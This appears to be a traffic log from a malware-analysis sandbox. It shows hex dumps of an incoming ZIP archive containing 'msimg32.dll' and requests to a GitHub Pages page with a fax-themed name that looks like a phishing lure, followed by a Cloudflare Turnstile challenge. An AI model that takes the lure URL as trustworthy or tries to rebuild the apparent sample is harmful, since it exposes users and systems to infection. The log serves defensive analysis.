2024-09-25 16:44:45 UTC	1378	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 3b 7f 39 59 70 9d c9 d7 8f 19 12 00 00 c0 24 00 0b 00 00 00 6d 73 69 6d 67 33 32 2e 64 6c 6c ec fd 79 7c 53 55 fe 3f 8e 97 b6 50 56 8b a0 82 a2 c2 08 0a 8a 02 d2 25 6d 93 26 69 d2 34 49 93 26 69 c3 5e 16 59 14 10 14 15 14 14 15 63 53 48 a7 0b 71 b0 12 45 07 15 15 47 9c 41 07 1d 40 60 28 14 5a 4a 4b d9 74 50 71 46 a0 d0 52 5a 52 ba cb da df 79 be ce 3d 37 69 c7 cf fb fb f9 7e ff fd bd 79 3c b8 b9 bd e7 dc b3 be ce 6b 7f bd 6e da 34 6f 48 58 48 48 48 38 fb df d1 11 12 b2 23 84 ff d3 86 fc 3f ff eb df 2d 24 e4 b6 a1 df dd 16 f2 4d af 23 7f d8 d1 cd 7a e4 0f 13 16 2c 5c 3a ec b9 17 96 cc 7f 61 f6 33 c3 e6 ce 7e f6 d9 25 cb 86 cd 79 72 d8 0b 2f 3e 3b 6c e1 b3 c3 92 ed ce 61 cf 2c 99 f7 e4 98 7e fd 7a 8f 90 da 08 ef 1b 99 aa 7d 66 Data Ascii: PK;9Yp$msimg32.dlly\|SU?PV%m&i4I&i^YcSHqEGA@`(ZJKtPqFRZRy=7i~y<kn4oHXHHH8#?-$M#z,\:a3~%yr/>;la,~z}f
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: 80 11 44 62 99 7a 63 18 06 6c 40 11 76 3f 17 60 d1 86 9d 39 8b a9 be 8a e6 6b 70 ca 5e c0 58 f6 60 f3 06 e3 04 64 61 57 d5 58 21 33 de 7d 1b 0b 1b 09 e0 fa ae 1f e0 cf c6 2e 6f 00 4b 0d 89 61 97 14 f4 f1 38 f6 e3 06 c0 67 fb 93 62 be 1f ac 65 97 8b 7d 30 5f 0c e8 9f 78 b7 17 b6 e2 7c 24 e0 19 bb fa 47 9c d0 07 81 8c 42 b0 51 8b b0 dd 77 a1 f3 b3 b8 58 31 2a 23 46 75 0e ef ce 00 6c f4 5c 8d f1 61 e0 33 51 5a 86 25 99 87 a1 ad 02 48 5d 43 6f 77 fe 11 f8 19 08 b4 0e 48 ba 0d bd bd 85 de 2a a6 b0 cb f2 c7 00 2f 78 63 06 2e 1e 34 bf 09 60 f1 67 f4 51 86 2d fb 1e 4b b7 11 0b 71 09 0b 3b 11 af 69 d1 d4 4a ec 60 2c e1 03 20 9e f7 e3 01 cf 80 c9 39 28 cd 2f 04 bc 60 c1 4e 02 eb fd 0d af e5 a0 de 27 28 18 8a 0d 38 8c de 5a 31 e6 e7 40 03 4e 63 c1 da 80 d1 8f a3 cb Data Ascii: Dbzcl@v?`9kp^X`daWX!3}.oKa8gbe}0_x\|$GBQwX1#Ful\a3QZ%H]CowH/xc.4`gQ-Kq;iJ`, 9(/`N'(8Z1@Nc
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: f5 48 4d 8c 36 9b 95 75 3d 54 a9 c6 34 75 da d4 49 ae ca ea c5 ac 81 92 b7 f5 6c dd 4a 3e 7b 10 fb bb 30 14 30 47 5d ed fb d7 04 06 77 ce 8b 3d b1 42 31 86 38 43 54 8c 99 3d cf 9c 5c 17 ae 8b b6 1a 5d 0d b7 7d cf de 38 fa dc 10 d6 e5 ef cf 22 1b dd 47 6e 35 54 48 ab 39 7a 7f 8e e1 50 ae fc 94 9d 8e d3 38 14 45 d5 fc 50 38 5d 55 ca 3e 80 c1 37 c6 74 0b c9 e4 c0 d7 f6 e7 44 f6 a4 72 c9 50 36 2c a7 03 4f ea b2 d8 e9 77 55 bd 74 0f ab b3 30 1f ef d2 46 ed a3 ae 0b c5 df a3 0f 47 e5 a3 f5 c8 ad 54 65 61 b6 5c 70 28 27 7f 37 bb cf cd c7 d1 c8 a5 23 93 93 ff 0d 7b 92 53 b8 83 5d 27 51 27 fe ba 18 d6 61 c6 24 dc 1f ee d3 c1 cf 63 c2 17 80 7d 82 cd e2 7e 4b 58 9f c5 bf dc ce 06 91 81 27 1c 4b a9 a3 ad 89 76 65 0a b0 d4 c5 08 3c 88 b6 59 53 cd 5a bc 71 0e 7a 41 d7 Data Ascii: HM6u=T4uIlJ>{00G]w=B18CT=\]}8"Gn5TH9zP8EP8]U>7tDrP6,OwUt0FGTea\p('7#{S]'Q'a$c}~KX'Kve<YSZqzA
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: 0b 5b ab 59 e9 75 e1 51 31 56 8b eb ec 88 39 dd 42 a6 96 66 7f 79 43 9a 99 eb 68 64 0f 41 4a d2 12 d4 a9 3a 9b c9 1c 4b 6f 10 84 d5 26 1c 03 06 a3 f5 ae 0e 0b ef 86 99 7d 79 a3 d3 cc c4 9f a3 f7 65 5d 09 65 d3 c2 df 0b 0b bf bc 11 98 d6 e7 37 40 aa f7 7f fd 3a 9d d9 55 60 6a 93 e6 31 60 cd a0 4d 6e aa b9 1f fb 74 64 19 9e d0 a9 bb 74 2a 8d f0 12 36 34 97 ef 55 f6 a8 9b d8 a5 47 d9 b5 f6 78 37 22 a3 9a f3 80 87 ca f1 f2 e8 cd 09 89 f6 f8 18 6b 22 6b 62 26 07 d6 e2 21 4d 40 23 7b f6 80 28 16 8e ba 19 38 19 8f de ec 34 87 47 6f 76 3a 19 f8 33 a7 b0 e7 69 09 0e eb c2 35 51 0e 85 20 d6 23 32 31 81 d5 91 dd c0 5d 1f d2 87 81 12 96 33 f2 e4 2a 52 0c 05 0d a4 f7 b2 2e 75 63 d2 10 c3 69 ce ba 30 9d c9 ce f7 c3 94 6c 1d 1f 17 47 5c 22 93 70 2e 82 af af 74 7d 03 66 Data Ascii: [YuQ1V9BfyChdAJ:Ko&}ye]e7@:U`j1`Mntdt64UGx7"k"kb&!M@#{(84Gov:3i5Q #21]3R.uci0lG\"p.t}f
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: f9 1c c3 c5 f4 c9 5c 3a 4b b0 1b 0d 51 6a 57 99 7f 23 db 27 ae db 3b f4 e6 11 e0 7b 6b 74 d2 14 49 c9 f2 eb 62 b0 1b 74 5a 0f 3d 90 09 2a 75 3c 0a f4 e9 8b b9 b4 a0 97 de b8 8f ad 1c 57 4c 35 ae fa 0f 36 79 f6 7c a0 8a b4 f3 d2 99 fd 5d cd 23 69 02 2e e6 e4 7f 49 2b f5 25 ad 91 16 d2 65 e1 01 92 0d de 80 74 99 8d 6b a9 96 a4 4b 86 d8 af 80 0e ef 3b f8 2f c1 64 2a 53 a3 34 b1 16 52 72 96 ad 38 88 29 b8 0e a9 f7 43 25 f0 46 28 c1 cb 1b d7 bb 6e 60 f6 1b 01 81 73 f4 f1 ac a6 bb f9 93 c8 ad 8e 70 a9 7a 12 2f 3b c6 ff cc b9 3d 97 86 92 53 58 f4 23 29 7d ba 27 81 93 7c 3c 05 c2 cf 72 a8 9f 38 b3 da f8 80 07 63 5b d3 9b ad cc d9 ab 8c 71 76 d5 d6 4d 0c 01 bb 1b 27 49 97 1c 71 ec 4f 84 ca a2 e9 69 52 1d 59 9e 40 5b ed 2b 08 89 84 c7 c4 1a 14 ae e6 b9 c7 20 e3 3c Data Ascii: \:KQjW#';{ktIbtZ=u<WL56y\|]#i.I+%etkK;/dS4Rr8)C%F(n`spz/;=SX#)}'\|<r8c[qvM'IqOiRY@[+ <
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: 1d a3 60 ec 2d fc ad be f3 02 fe 56 1f 00 d7 05 1c 5c f1 68 61 fe 6f f5 01 70 6d 01 9b c8 af f4 42 4e e1 57 34 52 8c 97 e1 b3 7f c3 f2 d0 e0 85 4d b2 b4 1c 43 68 50 3e c9 2d 14 f7 cf 11 56 2f ab 2e ca a2 77 40 0f c6 70 41 84 55 93 9a 68 b0 47 b9 2e 7e f7 84 c0 2f 7c 31 75 29 c9 e3 cd a9 16 47 0a f1 a1 96 98 54 53 b4 d5 c8 60 60 5c 90 5a 25 fa 66 e7 29 44 df ec 04 03 fc 60 cf a3 85 9b 47 30 30 05 e2 25 11 88 b3 cd 09 10 3c ea ba db e3 99 48 cb 51 be 4e 9d 90 64 d5 a9 08 e1 9c 7d 7d 21 94 03 cb fe 15 82 d3 b6 bb 39 70 da 8a 9a 3b 9d b6 a2 e6 4e a7 0d 7f e6 14 3e 41 b0 f6 04 9d b6 e9 b4 89 1c ee b2 f1 47 7c f6 14 19 ee d2 eb 22 52 93 8d 6a bd 3e d9 55 fb cd 7b e0 8c 33 8f 60 cf 38 f7 9d 9c 68 57 99 a2 6c ae c3 3f 82 c1 d8 df d2 00 3c 44 98 a9 d9 1a 06 33 ab Data Ascii: `-V\haopmBNW4RMChP>-V/.w@pAUhG.~/\|1u)GTS``\Z%f)D`G00%<HQNd}}!9p;N>AG\|"Rj>U{3`8hWl?<D3
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: d3 a6 25 b8 8a 5f 05 32 ae 5b 9e 00 a4 79 cf 43 32 d3 7e e8 75 90 de 2b cf 34 63 59 ca 46 92 50 de fe d3 1d 10 ca 25 03 4d 6c 54 82 3d 5a af 96 59 02 55 82 35 3a 29 da 04 43 a3 ab ec a4 9d f8 ab 8a 20 05 c6 b1 ce 0a 8c 63 9d 15 18 c7 48 81 d1 93 8e 57 4f 3a 5e e1 04 68 e1 3f 4b 6e 01 21 74 b8 76 48 0a 0c ae 3b ba b2 7d 0a f4 48 ae 2b 57 1e c5 c9 7e d6 0d 92 fe 56 bc 40 61 ba 14 47 8a de 9e 1a 0b 3f 90 29 0b f3 77 74 51 60 ec 08 52 60 84 f0 c3 b5 83 14 18 3b 82 14 18 df 40 81 41 9b 7e a5 9e 56 e4 a9 bf a1 4b ae ac 78 1e e6 f0 43 15 6c ed ea 7a 24 6a 8c 51 69 b1 ae 33 19 fb 49 ff 58 11 e4 16 70 ac 8b 5b c0 b1 ce 6e 01 34 f5 fc 1b 3f e1 14 df 20 86 e3 37 dc 17 fe f6 93 e4 16 d0 42 6e aa 5f 75 d6 dd 1c 5a 43 6e 67 c5 33 61 b6 2f be f8 1a 76 ce 75 66 ec 24 41 Data Ascii: %_2[yC2~u+4cYFP%MlT=ZYU5:)C cHWO:^h?Kn!tvH;}H+W~V@aG?)wtQ`R`;@A~VKxClz$jQi3IXp[n4? 7Bn_uZCng3a/vuf$A
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: ca a1 f1 3a ea 7a 38 b4 f1 06 ab 91 89 61 25 bf bc c2 15 d0 73 a0 04 ae 9c 98 0b 96 9b 8b 26 9f 43 85 7a e5 b7 81 6c 10 e4 16 20 f1 74 aa 0a 81 cd 63 74 76 45 82 4e 91 28 ab 5d 39 7f 90 10 9b 9a 12 ad 26 9c 47 c0 9e cb 0f 67 fe bd 74 2c 87 91 5b 00 dd 67 7b 69 a9 bc b4 eb 57 c8 2d a0 bb d2 ee 30 47 b9 2e be 77 23 44 68 25 a9 2b a5 39 da 1a 67 b3 52 54 40 65 9a 03 5a a7 b5 d9 d0 b1 15 5e 09 76 0b b8 f2 df 6e 01 57 ba ba 05 5c 91 dd 02 f2 68 d7 f2 68 28 6e 1a 0a 04 a6 b0 7c 37 0d e8 0d da b8 22 69 e3 24 d9 fa 7b f8 b9 b6 6d fc 95 ad 92 c4 35 1c 76 22 80 a6 1f 9e b7 7f fb 44 37 28 01 2b 27 fd 15 84 b6 b0 a8 cb c6 15 05 6d dc 1b 7c e3 8a 68 e3 8a 82 36 6e 37 b6 8c 5f b3 8b 64 65 00 97 88 2a 7f 83 a4 d3 b6 1f 1e bf 6d e3 ba 91 2d f6 ca bf a1 03 29 2a 03 05 b8 Data Ascii: :z8a%s&Czl tctvEN(]9&Ggt,[g{iW-0G.w#Dh%+9gRT@eZ^vnW\hh(n\|7"i${m5v"D7(+'m\|h6n7_dem-)
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: a0 21 27 d1 e6 a7 16 85 84 64 4a e7 7c 85 7c ce b5 74 ce 6f 40 7d 42 ab 5d 96 fb 2d 20 fe 81 87 c5 ce c4 ab e3 ec 56 7b 5c 32 a9 08 1a 33 22 c9 70 54 b5 e5 76 8a 17 b8 97 ce 79 48 0b ce f9 32 f9 9c 6b e9 9c df 4b e7 5c f2 7f fe f9 79 48 63 bb d0 76 55 b7 75 50 02 ed 6c 26 c9 dc df d1 1f 27 75 fa 74 9c da 98 32 b2 b0 2f a3 73 ee 08 9c f3 15 81 73 2e 59 68 ce 42 d5 b7 6f c1 14 58 47 b8 26 32 31 3a c1 12 15 93 e6 aa cb f8 27 ba 9a 16 01 85 7a 9c ca c4 46 79 43 9c f3 90 16 f9 9c 3b ea c2 a2 ac 2a d7 99 44 84 18 1c ca fb 06 e2 63 5d f8 f8 68 bb 5e 8a d8 71 28 ec 36 15 79 59 b9 ca 8f f4 27 f9 f1 86 38 e7 21 2d 41 e7 7c 70 d0 39 1f 2c 9f f3 c1 74 ce 97 d1 39 e7 5a db 33 51 88 3c 3e f3 09 45 23 d7 f6 25 eb fd c5 c9 bf 41 17 38 03 31 4f 87 1e 03 f5 3a 53 d0 44 b8 Data Ascii: !'dJ\|\|to@}B]- V{\23"pTvyH2kK\yHcvUuPl&'ut2/ss.YhBoXG&21:'zFyC;*Dc]h^q(6yY'8!-A\|p9,t9Z3Q<>E#%A81O:SD
2024-09-25 16:44:45 UTC	1378	IN	Data Raw: 31 e9 2c 7a 22 92 d0 55 f5 c2 30 50 ff 77 e1 ba 51 5e 80 c8 8c aa bb ef c6 68 b9 2b e5 c7 3a e0 8b 7d 08 69 38 37 f2 af 84 35 7a 0a 8c e4 6d 0f c6 48 f9 78 ce d0 51 ae ae 6f 4e f6 74 06 03 92 35 fc f6 66 ee a4 a1 85 09 a2 71 3b bc e0 1b f7 83 b9 39 5b 3c b3 9b 1c 9c 60 41 4c 5c d6 9e e9 8d 5d db 26 8c 94 3f 9d 18 9c 38 06 51 93 03 d0 93 62 30 1a ed a6 a8 a4 f1 6a f9 51 ea f8 e8 54 47 bc 4e af a1 f4 0c 35 67 90 98 24 9f 40 25 a7 f0 09 e2 0b e2 ae 49 c8 79 5e a3 b4 77 3e 60 a4 22 b6 b3 07 6e d1 82 cc 37 43 c3 76 07 19 4e 1b ee 40 64 22 6d 5c 4d ef f7 71 b0 26 3c 87 6b 31 a4 a5 86 b3 e3 89 65 9d 27 23 19 1b 21 99 79 02 c9 f0 82 7c 1b 47 32 e8 27 97 46 f1 54 6e 28 00 89 42 be f0 77 d6 be d0 9c 7c 5e 50 68 a5 ca 85 18 0b 13 35 df 85 d7 f8 b9 17 a0 4e 38 77 a3 Data Ascii: 1,z"U0PwQ^h+:}i875zmHxQoNt5fq;9[<`AL\]&?8Qb0jQTGN5g$@%Iy^w>`"n7CvN@d"m\Mq&<k1e'#!y\|G2'FTn(Bw\|^Ph5N8w

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:45:12 UTC	798	OUT	GET /frlpodf/marynewreleasefax.html HTTP/1.1 Host: maveuve.github.io Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 If-None-Match: "66f41242-10f5" If-Modified-Since: Wed, 25 Sep 2024 13:38:10 GMT
2024-09-25 16:45:12 UTC	390	IN	HTTP/1.1 304 Not Modified Connection: close Date: Wed, 25 Sep 2024 16:45:12 GMT Via: 1.1 varnish Cache-Control: max-age=600 ETag: "66f41242-10f5" Expires: Wed, 25 Sep 2024 16:55:12 GMT X-Served-By: cache-ewr-kewr1740044-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727282712.460678,VS0,VE15 Vary: Accept-Encoding X-Fastly-Request-ID: 9d2b95f2acc25a7a499a42cf8c7d7d065596e6ad

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:45:13 UTC	800	OUT	GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/9m1ve/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://maveuve.github.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:45:13 UTC	1369	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:45:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 164872 Connection: close referrer-policy: same-origin critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA cross-origin-opener-policy: same-origin origin-agent-cluster: ?1 cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self' permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA cross-origin-embedder-policy: require-corp cross-origin-resource-policy: cross-origin document-policy: js-profiling
2024-09-25 16:45:13 UTC	52	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 38 63 37 62 63 31 63 61 62 39 34 33 63 31 2d 45 57 52 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 8c8c7bc1cab943c1-EWR
2024-09-25 16:45:13 UTC	1317	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2024-09-25 16:45:13 UTC	1369	IN	Data Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
2024-09-25 16:45:13 UTC	1369	IN	Data Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
2024-09-25 16:45:13 UTC	1369	IN	Data Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
2024-09-25 16:45:13 UTC	1369	IN	Data Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
2024-09-25 16:45:13 UTC	1369	IN	Data Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
2024-09-25 16:45:13 UTC	1369	IN	Data Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb 